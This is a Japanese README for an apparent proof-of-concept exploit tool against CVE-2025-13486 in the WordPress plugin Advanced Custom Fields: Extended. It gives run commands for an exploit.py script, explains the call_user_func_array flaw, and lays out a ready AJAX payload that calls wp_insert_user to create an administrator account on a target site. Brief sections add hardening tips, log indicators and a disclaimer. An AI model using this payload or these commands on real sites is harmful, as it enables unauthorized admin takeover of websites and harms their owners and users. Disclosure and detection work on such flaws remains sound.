
Advanced Custom Fields Extended (ACFE) WordPress プラグインのエクスプロイト RCE - 管理者作成
CVE-2025-13486 の概念実証エクスプロイトです。これは Advanced Custom Fields: Extended (ACFE) WordPressプラグインの深刻な脆弱性で、リモートコード実行から権限昇格を可能にします。
| 側面 | 詳細 |
|---|---|
| CVE ID | CVE-2025-13486 |
| プラグイン | Advanced Custom Fields: Extended (ACFE) |
| タイプ | リモートコード実行 → 権限昇格 |
| リスクレベル | 深刻 |
| 影響を受けるバージョン | ACFEの脆弱なバージョン(具体的なバージョンは未定) |
| CVSSスコア | 9.8 深刻 |
| 発見日 | 2025 |
| 作成者 | 0xgh057r3c0n |
⚠️ 警告: このツールは許可されたセキュリティテストおよび教育目的のみに使用できます。
✅ 許可された使用:
❌ 禁止された使用:
作成者はこのツールの誤用について一切の責任を負いません。システムをテストする前に必ず適切な書面による許可を取得してください。
print_r関数を使用した脆弱性の確認wp_insert_userによる管理者ユーザー作成requestsライブラリ# リポジトリのクローン
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486
# 依存関係のインストール
pip install requests
# または requirements.txt からインストール
pip install -r requirements.txt
# スクリプトを実行可能にする (Linux/Mac)
chmod +x exploit.py
requirements.txt ファイルを作成します:
requests>=2.25.1
python3 exploit.py --url <TARGET_URL> [OPTIONS]
python3 exploit.py --url http://target.com --verify
python3 exploit.py --url https://target.com
python3 exploit.py --url https://target.com \
--user backup_admin \
--password "P@ssw0rd123!" \
--email [email protected]
python3 exploit.py --url target.com --verify
このエクスプロイトは、ACFEプラグインの acfe/form/render_form_ajax エンドポイントにおける不適切な関数ハンドリングを悪用し、攻撃者に任意のPHP関数を呼び出させるものです。
1. URLの検証 → HTTP/HTTPSを自動検出
2. Nonceの抽出 → ページをスキャンしてACF nonceを取得
3. ペイロードの構築 → 悪意のあるAJAXリクエストを作成
4. リクエストの実行 → ターゲットにエクスプロイトを送信
5. 結果の分析 → 成功指標を確認
// ACFE内の脆弱なコードパターン
$result = call_user_func_array($form['render'], array($form));
// エクスプロイトペイロードの構造
{
"action": "acfe/form/render_form_ajax",
"nonce": "extracted_nonce",
"form[render]": "wp_insert_user",
"form[user_login]": "attacker_user",
"form[user_pass]": "attacker_pass",
"form[user_email]": "[email protected]",
"form[role]": "administrator"
}
# 推奨セキュリティプラグイン
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security
# サーバーレベルの保護
- レート制限の実装
- mod_securityルールの有効化
- Cloudflareまたは類似のCDNの使用
- 定期的なセキュリティ監査
/wp-admin/admin-ajax.php への不審なAJAXリクエストaction=acfe/form/render_form_ajax を含むリクエストwp_insert_user 関数呼び出し# Apacheログ
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"
# WordPressデバッグログ
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
git checkout -b feature/improvement)git commit -am '新機能を追加')git push origin feature/improvement)バグや問題は以下の方法で報告してください:
CVE-2025-13486/
├── exploit.py # メインエクスプロイトスクリプト
├── README.md # このドキュメント
├── requirements.txt # Python依存関係
├── LICENSE # MITライセンスファイル
├── examples/ # 使用例
│ ├── verification.txt
│ └── exploitation.txt
└── tests/ # テストスクリプト
├── test_verify.py
└── test_exploit.py
0xgh057r3c0n - セキュリティ研究者
このプロジェクトは MITライセンス の下でライセンスされています - 詳細は LICENSE ファイルを参照してください。
セキュリティコミュニティのために ❤️ を込めて作成
⚠️ 責任を持って倫理的に使用してください ⚠️
| オプション | 説明 | 必須 | デフォルト |
|---|
-u, --url | ターゲットWordPress URL | はい | - |
--verify | 確認のみ、悪用なし | いいえ | False |
--user | 管理ユーザーのカスタムユーザー名 | いいえ | admin_XXXXX |
--password | 管理ユーザーのカスタムパスワード | いいえ | ランダム12文字 |
--email | 管理ユーザーのカスタムメール | いいえ | [email protected] |